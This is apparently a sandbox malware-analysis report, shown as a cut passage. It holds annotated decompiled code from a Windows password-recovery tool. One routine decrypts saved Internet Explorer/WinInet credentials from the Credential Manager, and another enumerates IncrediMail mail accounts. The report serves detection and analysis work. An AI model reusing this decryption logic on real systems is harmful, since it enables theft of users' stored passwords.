                                                  						E0040A27F(0, _t84, _t91, 0);
                                                  						L23:
                                                  						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                  							_t81 = _a12;
                                                  							_t86 =  *(_a12 + 0xc);
                                                  							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                  							if((_t86 & 0x00000008) == 0) {
                                                  								__eflags = _t86 & 0x00000040;
                                                  								if((_t86 & 0x00000040) != 0) {
                                                  									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                  									__eflags =  *0x4171ac;
                                                  									SetFocus( *(_t50 + 0x184));
                                                  								}
                                                  							} else {
                                                  								E00409D7E(_t50, _t81);
                                                  							}
                                                  						}
                                                  						return E004019AC(_t91, _t88, _a8, _a12);
                                                  					}
                                                  					_t53 = _t45 - 1;
                                                  					__eflags = _t53;
                                                  					if(_t53 == 0) {
                                                  						E0040A56C(__ecx);
                                                  						goto L22;
                                                  					}
                                                  					__eflags = _t53 == 6;
                                                  					if(_t53 == 6) {
                                                  						SetFocus( *(__ecx + 0x378));
                                                  					}
                                                  					goto L23;
                                                  				}
                                                  				if(_t92 == 0) {
                                                  					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                  					E0040A437(__ecx);
                                                  					goto L22;
                                                  				}
                                                  				if(_t88 == 0x1c) {
                                                  					__eflags = _a8;
                                                  					if(_a8 == 0) {
                                                  						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                  					} else {
                                                  						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                  					}
                                                  					goto L23;
                                                  				}
                                                  				if(_t88 == 0x20) {
                                                  					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                  					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                  						goto L23;
                                                  					}
                                                  					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                  					return 1;
                                                  				}
                                                  				if(_t88 == 0x2b) {
                                                  					_t82 = _a12;
                                                  					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                  					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                  						SetBkMode( *(_t82 + 0x18), 1);
                                                  						SetTextColor( *(_t82 + 0x18), 0xff0000);
                                                  						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
                                                  						asm("stosd");
                                                  						asm("stosd");
                                                  						asm("stosd");
                                                  						asm("stosd");
                                                  						_t90 = _a12;
                                                  						_v28 = 0x14;
                                                  						_v20 = 5;
                                                  						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
                                                  						SelectObject( *(_t90 + 0x18), _v8);
                                                  						_t88 = _a4;
                                                  					}
                                                  				} else {
                                                  					if(_t88 == 0x7b) {
                                                  						_t87 = _a8;
                                                  						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                  							E0040B372(__ecx, _t87);
                                                  						}
                                                  					}
                                                  				}
                                                  				goto L23;
                                                  			}

                                                  APIs
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                  • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                  • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                    • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                    • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                    • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                  • LoadCursorA.USER32 ref: 0040B63A
                                                  • SetCursor.USER32(00000000), ref: 0040B641
                                                  • PostMessageA.USER32 ref: 0040B663
                                                  • SetFocus.USER32(?), ref: 0040B69E
                                                  • SetFocus.USER32(?), ref: 0040B6EF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                  • String ID:
                                                  • API String ID: 1416211542-0
                                                  • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                  • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                  • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                  • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				long _v16;
                                                  				void* _t14;
                                                  				void* _t29;
                                                  				void* _t34;
                                                  				long _t36;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				EmptyClipboard();
                                                  				_t14 = E00405ECB(_a4);
                                                  				_v12 = _t14;
                                                  				if(_t14 == 0xffffffff) {
                                                  					_v8 = GetLastError();
                                                  				} else {
                                                  					_t36 = GetFileSize(_t14, 0);
                                                  					_t5 = _t36 + 1; // 0x1
                                                  					_t29 = GlobalAlloc(0x2000, _t5);
                                                  					if(_t29 == 0) {
                                                  						L4:
                                                  						_v8 = GetLastError();
                                                  					} else {
                                                  						_t34 = GlobalLock(_t29);
                                                  						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
                                                  							goto L4;
                                                  						} else {
                                                  							 *((char*)(_t34 + _t36)) = 0;
                                                  							GlobalUnlock(_t29);
                                                  							SetClipboardData(1, _t29);
                                                  						}
                                                  					}
                                                  					CloseHandle(_v12);
                                                  				}
                                                  				CloseClipboard();
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00405FD0
                                                    • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                  • GlobalLock.KERNEL32 ref: 0040600B
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                  • SetClipboardData.USER32 ref: 00406036
                                                  • GetLastError.KERNEL32 ref: 0040603E
                                                  • CloseHandle.KERNEL32(?), ref: 0040604A
                                                  • GetLastError.KERNEL32 ref: 00406055
                                                  • CloseClipboard.USER32 ref: 0040605E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                  • String ID:
                                                  • API String ID: 3604893535-0
                                                  • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                  • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                  • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                  • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 3177657795-318151290
                                                  • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                  • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                  • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                  • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E0040765B(void* __eflags, intOrPtr* _a4) {
                                                  				char _v532;
                                                  				short _v534;
                                                  				void _v1042;
                                                  				void _v1044;
                                                  				long _v1080;
                                                  				intOrPtr _v1084;
                                                  				intOrPtr _v1088;
                                                  				intOrPtr _v1096;
                                                  				int _v1104;
                                                  				char _v1108;
                                                  				intOrPtr _v1112;
                                                  				intOrPtr _v1116;
                                                  				intOrPtr _v1120;
                                                  				intOrPtr _v1124;
                                                  				intOrPtr _v1128;
                                                  				intOrPtr _v1132;
                                                  				long* _v1136;
                                                  				wchar_t* _v1140;
                                                  				wchar_t* _v1144;
                                                  				intOrPtr _v1148;
                                                  				char _v1152;
                                                  				intOrPtr _v1156;
                                                  				char _v1160;
                                                  				void* _v1164;
                                                  				void* _v1168;
                                                  				int _v1172;
                                                  				intOrPtr _v1176;
                                                  				char _v1180;
                                                  				char _v1184;
                                                  				signed int _v1188;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t76;
                                                  				int _t83;
                                                  				wchar_t* _t109;
                                                  				wchar_t* _t110;
                                                  				signed int _t120;
                                                  				int _t126;
                                                  				void* _t129;
                                                  				intOrPtr _t134;
                                                  				signed int _t140;
                                                  				void* _t142;
                                                  				void* _t143;
                                                  				void* _t144;
                                                  
                                                   				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                   				_push(_t129);
                                                   				_v1108 = 0;
                                                   				_v1104 = 0;
                                                   				// E00404647 loads advapi32.dll and resolves CredReadA / CredFree / CredDeleteA /
                                                   				// CredEnumerateA / CredEnumerateW (see the APIs list below); the resolved pointers
                                                   				// are called through _v1084 and _v1096.
                                                   				if(E00404647( &_v1108, _t129, __eflags) != 0) {
                                                   					_v1184 = 0;
                                                   					_v1180 = 0;
                                                   					if(_v1088 == 0) {
                                                   						_t76 = 0;
                                                   						__eflags = 0;
                                                   					} else {
                                                   						// CredEnumerate(Filter = NULL, Flags = 0, &Count, &Credentials): every Credential
                                                   						// Manager entry of the current user; _v1180 receives the count, _v1184 the
                                                   						// PCREDENTIAL array.
                                                   						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                   					}
                                                   					if(_t76 != 0) {
                                                   						// 9 dwords = 18 WCHARs: L"Microsoft_WinInet" plus terminator; _v1172 = 17 is the
                                                   						// prefix length used by wcsncmp below.
                                                   						_t120 = 9;
                                                   						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                   						_t143 = _t142 + 0xc;
                                                   						_v1172 = wcslen( &_v1080);
                                                   						_v1176 = 1;
                                                   						_v1188 = 0;
                                                   						if(_v1180 > 0) {
                                                   							while(_v1176 != 0) {
                                                   								// _t134 = Credentials[i]; +8 is CREDENTIALW.TargetName, matched as a prefix only.
                                                   								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                   								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                   								_t143 = _t143 + 0xc;
                                                   								if(_t83 == 0) {
                                                   									// Build the 0x4a-byte (37 WCHAR) DPAPI entropy at 0x417968: every UTF-16 unit of
                                                   									// the GUID string shifted left by two. This is the entropy Internet Explorer /
                                                   									// WinInet uses when it stores web credentials in the Credential Manager.
                                                   									do {
                                                   										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                   										 *(_t83 + 0x417968) =  *_t25 << 2;
                                                   										_t83 = _t83 + 2;
                                                   										_t152 = _t83 - 0x4a;
                                                   									} while (_t83 < 0x4a);
                                                   									// Input DATA_BLOB: pbData = CredentialBlob (+0x1c), cbData = CredentialBlobSize (+0x18).
                                                   									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                   									_t139 =  &_v532;
                                                   									// Entropy DATA_BLOB: cbData = 0x4a, pbData = the buffer filled above.
                                                   									_v1160 = 0x4a;
                                                   									_v1156 = 0x417968;
                                                   									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                   									// E004046D7 / E004047A0 set up a crypto helper (its partner E004047F1 calls FreeLibrary,
                                                   									// so a DLL is loaded here). E00404811 takes (data, entropy, &out), which is consistent
                                                   									// with a CryptUnprotectData wrapper; the wrapper itself is not in this excerpt.
                                                   									E004046D7( &_v532);
                                                   									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                   										// Copy at most 0x1fa bytes of the decrypted blob into a zeroed 0x1fe-byte buffer,
                                                   										// so the plaintext is always NUL-terminated.
                                                   										_v1044 = 0;
                                                   										memset( &_v1042, 0, 0x1fe);
                                                   										_t126 = _v1168;
                                                   										_t144 = _t143 + 0xc;
                                                   										if(_t126 > 0x1fa) {
                                                   											_t126 = 0x1fa;
                                                   										}
                                                   										memcpy( &_v1044, _v1164, _t126);
                                                   										// Record handed to the caller: Persist (+0x20), Type (+4), LastWritten (+0x10/+0x14),
                                                   										// TargetAlias (+0x2c), TargetName (+8), Comment (+0xc), then the decrypted text.
                                                   										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                   										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                   										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                   										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                   										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                   										_v1144 =  *(_t134 + 8);
                                                   										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                   										_t109 =  &_v1044;
                                                   										_v534 = 0;
                                                   										_v1140 = _t109;
                                                   										_v1136 = 0x4125f4;
                                                   										// The plaintext is "user:password": the first ':' is overwritten with NUL, so _v1140
                                                   										// is the user name and _v1136 the text after the colon (the decompiler renders that
                                                   										// pointer as &_t110[0]; 0x4125f4 is the default used when there is no colon).
                                                   										_t110 = wcschr(_t109, 0x3a);
                                                   										_t143 = _t144 + 0x14;
                                                   										if(_t110 != 0) {
                                                   											 *_t110 = 0;
                                                   											_v1136 =  &(_t110[0]);
                                                   										}
                                                   										// Invoke the caller-supplied callback with the filled record, then release the
                                                   										// decrypt output (the decompiler's _v1164/_v1168 pointer/size labels are not reliable).
                                                   										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                   										LocalFree(_v1168);
                                                   									}
                                                   									E004047F1( &_v532);
                                                   								}
                                                   								_v1188 = _v1188 + 1;
                                                   								if(_v1188 < _v1180) {
                                                   									continue;
                                                   								}
                                                   								goto L18;
                                                   							}
                                                   						}
                                                   						L18:
                                                   						// CredFree(Credentials)
                                                   						_v1096(_v1184);
                                                   					}
                                                   				}
                                                   				return E004046C2( &_v1108);
                                                  			}

                                                   (Instruction address column collapsed: the routine above occupies 0x00407661 to 0x0040787a.)

                                                  APIs
                                                    • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                  • wcslen.MSVCRT ref: 004076C5
                                                  • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                  • memset.MSVCRT ref: 0040779D
                                                  • memcpy.MSVCRT ref: 004077C1
                                                  • wcschr.MSVCRT ref: 00407815
                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                    • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                  • String ID: J$Microsoft_WinInet$hyA
                                                  • API String ID: 2413121283-319027496
                                                  • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                  • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                  • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                  • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				int _v16;
                                                  				void _v271;
                                                  				char _v272;
                                                  				void _v527;
                                                  				char _v528;
                                                  				void _v827;
                                                  				char _v828;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t40;
                                                  				void* _t44;
                                                  				void* _t55;
                                                  				void* _t60;
                                                  				void* _t66;
                                                  				void* _t67;
                                                  				void* _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				void* _t77;
                                                  
                                                   				_t77 = __fp0;
                                                   				_t66 = __ecx;
                                                   				_t67 = __eax;
                                                   				// E0040EB3F wraps RegOpenKeyExA (see APIs): open <root>\Software\IncrediMail\Identities
                                                   				// under the key passed in _a4; the opened handle is written back into _a4.
                                                   				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
                                                   				_t72 = _t71 + 0xc;
                                                   				if(_t40 == 0) {
                                                   					_v12 = 0;
                                                   					_v272 = 0;
                                                   					memset( &_v271, 0, 0xff);
                                                   					// E0040EC05 wraps RegEnumKeyExA: _v272 receives the name of subkey number _v12.
                                                   					_t44 = E0040EC05(_a4, 0,  &_v272);
                                                   					_t73 = _t72 + 0x18;
                                                   					while(_t44 == 0) {
                                                   						// E0040EBC1 is not in this excerpt; from its arguments it presumably reads the
                                                   						// "Identity" value of this subkey into the caller's object at +0xa9c (0x7f bytes max).
                                                   						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                   						_v828 = 0;
                                                   						memset( &_v827, 0, 0x12b);
                                                   						// Each identity has an Accounts subkey; open it and enumerate its children.
                                                   						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                   						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
                                                   						_t74 = _t73 + 0x38;
                                                   						if(_t55 == 0) {
                                                   							_v16 = 0;
                                                   							_v528 = 0;
                                                   							memset( &_v527, 0, 0xff);
                                                   							_t60 = E0040EC05(_v8, 0,  &_v528);
                                                   							_t74 = _t74 + 0x18;
                                                   							while(_t60 == 0) {
                                                   								// Per-account extraction (E00402D9A, not in this excerpt).
                                                   								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                   								_v16 = _v16 + 1;
                                                   								_t60 = E0040EC05(_v8, _v16,  &_v528);
                                                   								_t74 = _t74 + 0xc;
                                                   							}
                                                   							RegCloseKey(_v8);
                                                   						}
                                                   						_v12 = _v12 + 1;
                                                   						_t44 = E0040EC05(_a4, _v12,  &_v272);
                                                   						_t73 = _t74 + 0xc;
                                                   					}
                                                   					_t40 = RegCloseKey(_a4);
                                                   				}
                                                   				// Clear the identity name once the walk is complete.
                                                   				 *((char*)(_t67 + 0xa9c)) = 0;
                                                   				return _t40;
                                                  			}

                                                   (Instruction address column collapsed: E00402FC2 occupies 0x00402fc2 to 0x0040311c.)

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 00403005
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • memset.MSVCRT ref: 00403052
                                                  • sprintf.MSVCRT ref: 0040306A
                                                  • memset.MSVCRT ref: 0040309B
                                                  • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Close$EnumOpensprintf
                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                  • API String ID: 3672803090-3168940695
                                                  • Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                  • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                  • Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
                                                  • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                  				char* _v0;
                                                  				int _v4;
                                                  				int _t39;
                                                  				char* _t49;
                                                  				void* _t51;
                                                  				int _t64;
                                                  				signed int _t70;
                                                  				signed int _t71;
                                                  
                                                   				_t59 = __ecx;
                                                   				_t71 = _t70 & 0xfffffff8;
                                                   				// Likely a stack probe: the locals below include two 4 KiB text buffers.
                                                   				E004118A0(0x204c, __ecx);
                                                   				// Walk every item of the menu handle in _a8 (the decompiler labels it _a8.cbSize
                                                   				// because the same slot is reused for the MENUITEMINFOA structure below).
                                                   				_t39 = GetMenuItemCount(_a8.cbSize);
                                                   				_a4 = _t39;
                                                   				_v4 = 0;
                                                   				if(_t39 <= 0) {
                                                   					L15:
                                                   					return _t39;
                                                   				} else {
                                                   					do {
                                                   						memset( &_a57, 0, 0x1000);
                                                   						_t71 = _t71 + 0xc;
                                                   						// MENUITEMINFOA: cbSize = 0x30, fMask = 0x36 (MIIM_ID | MIIM_SUBMENU | MIIM_TYPE | MIIM_DATA),
                                                   						// dwTypeData = the 4 KiB buffer at _a56, cch = 0x1000; queried by position (fByPosition = 1).
                                                   						_a44 =  &_a56;
                                                   						_a8.cbSize = 0x30;
                                                   						_a12 = 0x36;
                                                   						_a48 = 0x1000;
                                                   						_a56 = 0;
                                                   						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                   							goto L14;
                                                   						}
                                                   						// Items without text (separators) are not rewritten, but a submenu is still recursed into at L12.
                                                   						if(_a56 == 0) {
                                                   							L12:
                                                   							_t80 = _a28;
                                                   							if(_a28 != 0) {
                                                   								// Recurse into hSubMenu (+0x14 of the structure).
                                                   								_push(0);
                                                   								_push(_a28);
                                                   								_push(_a4);
                                                   								E00407A64(_t59, _t80);
                                                   								_t71 = _t71 + 0xc;
                                                   							}
                                                   							goto L14;
                                                   						}
                                                   						// wID of the item; text after a TAB (9) is the accelerator label and is re-appended below.
                                                   						_t64 = _a24;
                                                   						_a4160 = 0;
                                                   						memset( &_a4161, 0, 0x1000);
                                                   						_t49 = strchr( &_a56, 9);
                                                   						_t71 = _t71 + 0x14;
                                                   						_v0 = _t49;
                                                   						// Popup items carry no usable wID, so a synthetic id is taken from a global counter
                                                   						// (0x11558 + *0x4171b4) or from the position (0x11171 + index).
                                                   						if(_a28 != 0) {
                                                   							if(_a12 == 0) {
                                                   								 *0x4171b4 =  *0x4171b4 + 1;
                                                   								_t64 =  *0x4171b4 + 0x11558;
                                                   								__eflags = _t64;
                                                   							} else {
                                                   								_t64 = _v4 + 0x11171;
                                                   							}
                                                   						}
                                                   						// E00407D89 (not in this excerpt) fills _a4160 with replacement text for this id; on
                                                   						// success the accelerator label is appended again and the item is replaced in place
                                                   						// (0x400 = MF_BYPOSITION). This is consistent with the language-file menu translation
                                                   						// of the NirSoft tools that the MailPassView / WebBrowserPassView Yara rules detect.
                                                   						_t51 = E00407D89(_t64,  &_a4160);
                                                   						_pop(_t59);
                                                   						if(_t51 != 0) {
                                                   							if(_v0 != 0) {
                                                   								strcat( &_a4160, _v0);
                                                   								_pop(_t59);
                                                   							}
                                                   							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                   						}
                                                   						goto L12;
                                                   						L14:
                                                   						_v4 = _v4 + 1;
                                                   						_t39 = _v4;
                                                   					} while (_t39 < _a4);
                                                   					goto L15;
                                                   				}
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 1757351179-3849865405
                                                  • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                  • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                  • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                  • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                  • memcpy.MSVCRT ref: 0040EA04
                                                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                  Strings
                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                  • API String ID: 1640410171-2022683286
                                                  • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                  • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                  • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                  • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E004081B5(void* __eflags, char* _a4) {
                                                  				void* __esi;
                                                  				void* _t3;
                                                  				int _t6;
                                                  
                                                  				// E0040614B wraps GetFileAttributesA: the loader only proceeds if the file named by _a4 exists.
                                                  				_t3 = E0040614B(_a4);
                                                  				if(_t3 != 0) {
